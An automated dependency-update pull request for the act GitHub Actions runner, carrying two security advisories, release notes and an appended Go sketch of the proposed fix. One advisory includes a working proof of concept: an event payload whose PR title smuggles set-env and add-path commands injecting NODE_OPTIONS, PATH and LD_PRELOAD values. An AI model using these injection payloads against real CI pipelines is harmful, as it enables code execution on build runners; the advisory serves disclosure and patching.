fix(deps): update module github.com/nektos/act to v0.2.86 [security] #23

Open · TheFox0x7 wants to merge 1 commit into renovate-tests from renovate2/go-github.1485827954.workers.dev-nektos-act-vulnerability

Conversation


@TheFox0x7 TheFox0x7 commented Apr 25, 2026

This PR contains the following updates:

Package: github.com/nektos/act
Change: v0.2.63 -> v0.2.86

act: actions/cache server allows malicious cache injection

CVE-2026-34042 / GHSA-x34h-54cw-9825 / GO-2026-4890

More information

Details

act's built-in actions/cache server listens to connections on all interfaces and allows anyone who can connect to it — including someone anywhere on the internet — to create caches with arbitrary keys and retrieve all existing caches. If one can predict which cache keys will be used by local actions, one can create malicious caches containing whatever files one pleases, most likely allowing arbitrary remote code execution within the Docker container.

Discovery

Discovered while discussing forgejo/runner#294.

Proposed Mitigation

It was discussed to append a secret to ACTIONS_CACHE_URL to retain compatibility with GitHub's cache action and still allow authorization. Forgejo is considering also encoding which repo is currently being run in CI into the secret in the URL to prevent unrelated repos using the same (probably global) runner from seeing each other's caches.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


act: Unrestricted set-env and add-path command processing enables environment injection

CVE-2026-34041 / GHSA-xmgr-9pqc-h5vw / GO-2026-4891

More information

Details

Summary

act unconditionally processes the deprecated ::set-env:: and ::add-path:: workflow commands, which GitHub Actions disabled in October 2020 (CVE-2020-15228, GHSA-mfwh-5m23-j46w) due to environment injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify the PATH for all subsequent steps in the job. This makes act strictly less secure than GitHub Actions for the same workflow file.

Vulnerable Code

pkg/runner/command.go, lines 52-58:

switch command {
case "set-env":
    rc.setEnv(ctx, kvPairs, arg)
case "set-output":
    rc.setOutput(ctx, kvPairs, arg)
case "add-path":
    rc.addPath(ctx, arg)

There is no check for the ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable. The string ACTIONS_ALLOW_UNSECURE_COMMANDS does not appear anywhere in the act codebase.

On GitHub Actions, these commands are rejected unless ACTIONS_ALLOW_UNSECURE_COMMANDS=true is set:

Error: The `set-env` command is disabled. Please upgrade to using Environment Files
  or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true.

PoC: Environment and PATH Injection via PR Title

Tested on: act 0.2.84, Docker Desktop 29.1.2, macOS Darwin 24.5.0

Step 1 — Create a workflow that logs PR metadata:

.github/workflows/vuln.yml:

name: Vulnerable Workflow
on: [pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Log PR info
        run: |
          echo "Processing PR: $"

      - name: Subsequent step - check environment
        run: |
          echo "=== Environment Injection Check ==="
          echo "NODE_OPTIONS=$NODE_OPTIONS"
          echo "EVIL_VAR=$EVIL_VAR"
          echo "PATH=$PATH"

Step 2 — Create a malicious event payload:

event.json:

{
  "pull_request": {
    "title": "Fix typo\n::set-env name=EVIL_VAR::INJECTED_BY_ATTACKER\n::set-env name=NODE_OPTIONS::--require=/tmp/evil.js\n::add-path::/tmp/evil-bin",
    "number": 1,
    "head": { "ref": "fix-typo", "sha": "abc123" },
    "base": { "ref": "main", "sha": "def456" }
  }
}

Step 3 — Run:

git init && git add -A && git commit -m "init"
act pull_request -e event.json

Result:

[Vulnerable Workflow/build]   | Processing PR: Fix typo
[Vulnerable Workflow/build]   ⚙  ::set-env:: EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   ⚙  ::set-env:: NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   ⚙  ::add-path:: /tmp/evil-bin
[Vulnerable Workflow/build]   ✅  Success - Main Log PR info

[Vulnerable Workflow/build]   | === Environment Injection Check ===
[Vulnerable Workflow/build]   | NODE_OPTIONS=--require=/tmp/evil.js
[Vulnerable Workflow/build]   | EVIL_VAR=INJECTED_BY_ATTACKER
[Vulnerable Workflow/build]   | PATH=/tmp/evil-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[Vulnerable Workflow/build]   | EXPLOITED: EVIL_VAR was injected into this step!
[Vulnerable Workflow/build]   ✅  Success
[Vulnerable Workflow/build] 🏁  Job succeeded

All three injections succeeded silently:

  • EVIL_VAR=INJECTED_BY_ATTACKER — arbitrary env var injected into subsequent step
  • NODE_OPTIONS=--require=/tmp/evil.js — Node.js code execution vector
  • /tmp/evil-bin prepended to PATH — command hijacking vector

Attack Scenarios

Scenario 1: Malicious PR title/body. An attacker opens a PR with ::set-env name=NODE_OPTIONS::--require=/tmp/evil.js embedded in the title. If any workflow step echoes the title (common for build summaries, Slack notifications, changelog generation), the injection fires. On GitHub Actions this is blocked. On act, it succeeds.

Scenario 2: Malicious branch name. $ is attacker-controlled. A branch named fix-typo%0A::set-env name=LD_PRELOAD::/tmp/evil.so can inject LD_PRELOAD, which causes every subsequent dynamically-linked binary to load the attacker's shared library.

Scenario 3: Commit message injection. If a step runs git log --oneline and the output flows to stdout, an attacker's commit message containing ::set-env:: commands will be processed.

Impact

  • Command injection via env vars: LD_PRELOAD, NODE_OPTIONS, PYTHONPATH, BASH_ENV, PERL5OPT all enable arbitrary code execution
  • PATH hijacking: attacker-controlled directory prepended to PATH hijacks any subsequent command
  • Cross-step escalation: a step that merely logs untrusted data compromises all subsequent steps
  • Supply chain risk: workflows that are safe on GitHub Actions become exploitable when run locally with act — developers have a false sense of security

Suggested Fix

Add a check matching GitHub Actions' behavior:

case "set-env":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `set-env` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.setEnv(ctx, kvPairs, arg)
case "add-path":
    if rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
        logger.Errorf("The `add-path` command is disabled. Please upgrade to using Environment Files or opt-in by setting ACTIONS_ALLOW_UNSECURE_COMMANDS=true")
        return false
    }
    rc.addPath(ctx, arg)

This is a minimal, backwards-compatible fix — users who genuinely need these deprecated commands can opt in via ACTIONS_ALLOW_UNSECURE_COMMANDS=true, matching GitHub's approach.


Written by Golan Myers

Severity

  • CVSS Score: 7.7 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


act: actions/cache server allows malicious cache injection in github.com/nektos/act

CVE-2026-34042 / GHSA-x34h-54cw-9825 / GO-2026-4890

More information

Details

act: actions/cache server allows malicious cache injection in github.com/nektos/act

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


act: Unrestricted set-env and add-path command processing enables environment injection in github.com/nektos/act

CVE-2026-34041 / GHSA-xmgr-9pqc-h5vw / GO-2026-4891

More information

Details

act: Unrestricted set-env and add-path command processing enables environment injection in github.com/nektos/act

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


Release Notes

nektos/act (github.com/nektos/act)

v0.2.86

Compare Source

Changelog

Other
  • e71313c chore: bump VERSION to 0.2.86
  • c28c27e Merge commit from fork
  • 0c739c8 Merge commit from fork
  • 10add23 build(deps): bump GitHub Actions to fix Node.js 20 deprecation (#6036)

v0.2.85

Compare Source

Changelog

Other
  • 4ea8ec2 chore: bump VERSION to 0.2.85
  • 9e6190d build(deps): bump go.opentelemetry.io/otel/sdk from 1.28.0 to 1.40.0 (#6014)
  • 77470a0 build(deps): bump github.com/cloudflare/circl from 1.6.1 to 1.6.3 (#6010)
  • 1030ad2 build(deps): bump github.com/go-git/go-git/v5 from 5.16.2 to 5.16.5 (#6001)

v0.2.84

Compare Source

Changelog

v0.2.83

Compare Source

Changelog

Other
  • 6abb867 chore: bump VERSION to 0.2.83
  • e16ac81 chore(mergify) Add merge queue configuration to .mergify.yml (#5944)

v0.2.82

Compare Source

Changelog

Other
  • 3d71542 chore: bump VERSION to 0.2.82
  • 2f9675f build(deps): bump the dependencies group across 1 directory with 10 updates (#5935)

v0.2.81

Compare Source

Changelog

Other
  • f5a0dde chore: bump VERSION to 0.2.81
  • c8a205e refactor: simplify adding new node versions add node 24 (#5899)
  • a78b3f3 chore: mergify does no longer support queue_conditions != merge_conditions for require status checks to be up to date (#5891)

v0.2.80

Compare Source

Changelog

Bug fixes
  • 61396d8 fix: use ubuntu-latest bookworm instead of buster for tests (#5884)
Other
  • bf8e52b chore: bump VERSION to 0.2.80
  • 5319acf build(deps): bump the dependencies group with 5 updates (#5861)

v0.2.79

Compare Source

Changelog

Other
  • 7e22245 chore: bump VERSION to 0.2.79
  • dd58f5e build(deps): bump github.com/go-viper/mapstructure/v2 (#5837)
  • 0bc47ae added info log when container image platform mismatched (#3225)
  • d9c6afc ci: fix goreleaser config (#5276)
  • 1622c21 build(deps): bump the dependencies group across 1 directory with 5 updates (#4986)

v0.2.78

Compare Source

Changelog

New Features
  • 16b86a6 feat: add cli option to set concurrent jobs count (#2762)
  • bd4bc99 feat: add models permission level for AI inference responses (#2767)

v0.2.77

Compare Source

Changelog

v0.2.76

Compare Source

Changelog

Bug fixes
  • 517c3ac fix: reporting fetch failure as job error and log the error (#2715)

v0.2.75

Compare Source

Changelog

v0.2.74

Compare Source

Changelog

v0.2.73

Compare Source

Changelog

v0.2.72

Compare Source

Changelog

Other
  • be1b6ee chore: bump VERSION to 0.2.72
  • 9dd0854 Added support for dereferenced map properties (#2635)
  • 7c45ad6 build(deps): bump github.com/docker/cli (#2634)
  • 7bfe066 build(deps): bump github.com/rhysd/actionlint from 1.7.6 to 1.7.7 (#2624)
  • bcafb8f build(deps): bump google.golang.org/protobuf from 1.36.2 to 1.36.3 (#2623)
  • 652265b build(deps): bump golangci/golangci-lint-action from 6.1.1 to 6.2.0 (#2622)
  • 5ce39f6 Add GitHub Local Actions to README (#2588)
  • a9e31cd build(deps): bump google.golang.org/protobuf from 1.36.1 to 1.36.2 (#2612)
  • 0ff68e6 build(deps): bump github.com/go-git/go-git/v5 from 5.13.0 to 5.13.1 (#2604)
  • 4c9875b build(deps): bump github.com/rhysd/actionlint from 1.7.5 to 1.7.6 (#2603)
  • 24adb1e build(deps): bump golang.org/x/term from 0.27.0 to 0.28.0 (#2602)

v0.2.71

Compare Source

Changelog

New Features
  • fe017a1 feat: Adding in logic to check if act needs to be downloaded (#2575)
Bug fixes
  • deea8ec fix: prevent unintended input replacement in reusable workflows with workflow_dispatch when using workflow_call (#2502)
  • b4ef6fb fix: short sha has at least four digits (#2540)
  • e6b5062 fix: amd64 arch to X64 (#2580)
Other
  • 0006dee chore: bump VERSION to 0.2.71
  • 0ca1e18 Fix typo in --action-offline-mode option description (#2590)
  • a64359c build(deps): bump github.com/go-git/go-git/v5 from 5.12.0 to 5.13.0 (#2595)
  • ccfadfe build(deps): bump github.com/go-git/go-billy/v5 from 5.6.0 to 5.6.1 (#2594)
  • c315398 build(deps): bump github.com/rhysd/actionlint from 1.7.4 to 1.7.5 (#2593)
  • bd8dda1 ci(mergify): upgrade configuration to current format (#2547)
  • 7172fc3 chore: upgrade dependencies (#2589)

v0.2.70

Compare Source

Changelog

Other
  • 9c7f103 chore: bump VERSION to 0.2.70
  • 0e8b33b build(deps): bump megalinter/megalinter from 8.2.0 to 8.3.0 (#2541)
  • 69ec4a5 build(deps): bump github.com/creack/pty from 1.1.23 to 1.1.24 (#2533)
  • c90203e build(deps): bump codecov/codecov-action from 4 to 5 (#2532)
  • e5e7bdd build(deps): bump megalinter/megalinter from 8.1.0 to 8.2.0 (#2531)
  • ebcc0a8 build(deps): bump github.com/rhysd/actionlint from 1.7.3 to 1.7.4 (#2527)
  • 9bd99e5 build(deps): bump github.com/adrg/xdg from 0.5.0 to 0.5.3 (#2515)

v0.2.69

Compare Source

Changelog

Other
  • 0de940b chore: bump VERSION to 0.2.69
  • e3b4e3a add test for listartifacts v4 filter (#2507)
  • 0c09a77 build(deps): bump github.com/go-git/go-billy/v5 from 5.5.0 to 5.6.0 (#2506)
  • 9135745 build(deps): bump github.com/opencontainers/selinux (#2498)
  • ccd28e7 build(deps): bump megalinter/megalinter from 8.0.0 to 8.1.0 (#2485)
  • 5031a9f build(deps): bump google.golang.org/protobuf from 1.34.2 to 1.35.1 (#2484)
  • bb9f36d build(deps): bump golang.org/x/term from 0.24.0 to 0.25.0 (#2480)
  • ad1cef0 build(deps): bump golangci/golangci-lint-action from 6.0.1 to 6.1.1 (#2479)

v0.2.68

Compare Source

Changelog

New Features
  • 013c0d4 feat: generate a manual page automatically with cobra/doc (#2352)

v0.2.67

Compare Source

Changelog

Other
  • f75a2d8 chore: bump VERSION to 0.2.67
  • d8b6f61 build(deps): bump golang.org/x/term from 0.23.0 to 0.24.0 (#2442)

v0.2.66

Compare Source

Changelog

Other
  • 38e43bd chore: bump VERSION to 0.2.66
  • c9ae534 build(deps): bump golang.org/x/term from 0.22.0 to 0.23.0 (#2421)
  • ca292cd build(deps): bump megalinter/megalinter from 7.13.0 to 8.0.0 (#2436)
  • f79a13e build(deps): bump dario.cat/mergo from 1.0.0 to 1.0.1 (#2430)
  • 60a2fed fix GOOS parsing to match expected GHA RUNNER_OS values (#2422)

v0.2.65

Compare Source

Changelog

Other
  • bda491e chore: bump VERSION to 0.2.65
  • cd8b710 remove double negation in --help (#2405)
  • a62063b Bump mergo to v1.0.0 with new module URL (#2403)
  • 2feff3f build(deps): bump github.com/timshannon/bolthold to v0.0.0-20240314194003-30aac6950928 (#2248)
  • 570ccf3 Fix #2363. Add /pre- and /post-entrypoint handling (#2394)
  • 1d6a00c build(deps): bump golang.org/x/term from 0.21.0 to 0.22.0 (#2387)
  • 21fe901 build(deps): bump github.com/adrg/xdg from 0.4.0 to 0.5.0 (#2398)
  • 1ac4b60 build(deps): bump megalinter/megalinter from 7.11.1 to 7.13.0 (#2389)

v0.2.64

Compare Source

Changelog

Other
  • aa54ea9 chore: bump VERSION to 0.2.64
  • 935e4c3 build(deps): bump github.com/spf13/cobra from 1.8.0 to 1.8.1 (#2366)
  • 8a64a76 build(deps): bump google.golang.org/protobuf from 1.34.1 to 1.34.2 (#2365)
  • f9ea5e3 build(deps): bump golang.org/x/term from 0.20.0 to 0.21.0 (#2360)
  • 7b950e1 build(deps): bump github.com/docker/cli (#2358)
  • 55a8f9a Add riscv64 binary release (#2350)
  • 71a6fa0 build(deps): bump github.com/rhysd/actionlint from 1.7.0 to 1.7.1 (#2346)

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR has been generated by Mend Renovate.
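Added example, not act's code and not part of the advisory or this PR: a constructed Go model of the workflow-command gate that the "Suggested Fix" for CVE-2026-34041 describes, run over the kind of stdout lines the PoC above produces. The runContext type and handleLine parser are assumptions that only approximate act's real command handling.

```go
package main

import (
	"fmt"
	"strings"
)
// runContext is a constructed stand-in for act's run context (assumption, not act's type).
type runContext struct {
	Env  map[string]string // environment later steps will see
	Path []string          // PATH entries later steps will see
}
// The deprecated commands GitHub Actions disabled in October 2020 (CVE-2020-15228).
var unsecureCommands = map[string]bool{"set-env": true, "add-path": true}
// handleLine parses one stdout line ("::cmd k=v::arg"); applied is true only if rc changed.
func (rc *runContext) handleLine(line string) (applied bool, err error) {
	if !strings.HasPrefix(line, "::") {
		return false, nil // ordinary output, not a workflow command
	}
	head, arg, ok := strings.Cut(line[2:], "::")
	if !ok {
		return false, nil
	}
	command, props, _ := strings.Cut(head, " ")
	kv := map[string]string{}
	for _, pair := range strings.Split(props, ",") {
		if k, v, ok := strings.Cut(pair, "="); ok {
			kv[k] = v
		}
	}
	// The gate from the advisory's Suggested Fix: refuse set-env/add-path unless opted in.
	if unsecureCommands[command] && rc.Env["ACTIONS_ALLOW_UNSECURE_COMMANDS"] != "true" {
		return false, fmt.Errorf("the `%s` command is disabled; upgrade to Environment Files or opt in with ACTIONS_ALLOW_UNSECURE_COMMANDS=true", command)
	}
	switch command {
	case "set-env":
		rc.Env[kv["name"]] = arg
	case "add-path":
		rc.Path = append([]string{arg}, rc.Path...)
	default:
		return false, nil // set-output and other commands are out of scope here
	}
	return true, nil
}
func main() { // constructed stdout of a step that echoed the PoC's PR title
	rc := &runContext{Env: map[string]string{}, Path: []string{"/usr/bin"}}
	for _, l := range []string{"Processing PR: Fix typo", "::set-env name=EVIL_VAR::INJECTED", "::add-path::/tmp/evil-bin"} {
		fmt.Println(rc.handleLine(l))
	}
	fmt.Println(rc.Env, rc.Path)
}
```

Without the opt-in variable both injected lines are refused and the environment and PATH are unchanged; with ACTIONS_ALLOW_UNSECURE_COMMANDS=true they are applied, which is the GitHub Actions behaviour the advisory asks act to match.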

@TheFox0x7 TheFox0x7 force-pushed the renovate2/go-github.1485827954.workers.dev-nektos-act-vulnerability branch from 81c77f0 to d9f5c6b Compare April 26, 2026 12:23
@TheFox0x7 TheFox0x7 changed the base branch from renovate to renovate-tests April 26, 2026 12:23